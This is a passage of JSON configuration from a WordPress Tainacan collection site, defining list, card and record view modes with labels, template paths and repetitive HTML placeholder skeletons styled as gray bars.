var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray1, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray0, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray1, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray0, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray1, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray0, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray1, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray0, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":false},"cards":{"label":"Tarjetas","description":"A cards view, displaying cropped thumbnails, title and description.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-cards.php","component":"view-mode-cards","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewcards tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; display: grid;grid-template-columns: repeat(auto-fill, minmax(220px,1fr)); gap: 15px;padding: 0;\"\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height: 64px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px;\"\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 86%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 84%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 51%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height: 64px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px;\"\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 87%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 90%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 42%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height: 64px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px;\"\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 75%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 39%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height: 64px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px;\"\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 91%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 81%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height: 64px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px;\"\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 93%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 75%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 37%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height: 64px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px;\"\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 98%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 81%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":false},"records":{"label":"Registros","description":"A records view, similiar to cards, but flexible for metadata.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-records.php","component":"view-mode-records","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewrecords tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; column-width: 220px; gap: 15px;padding: 0;\"\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 89%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 84%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 90%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 84%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; 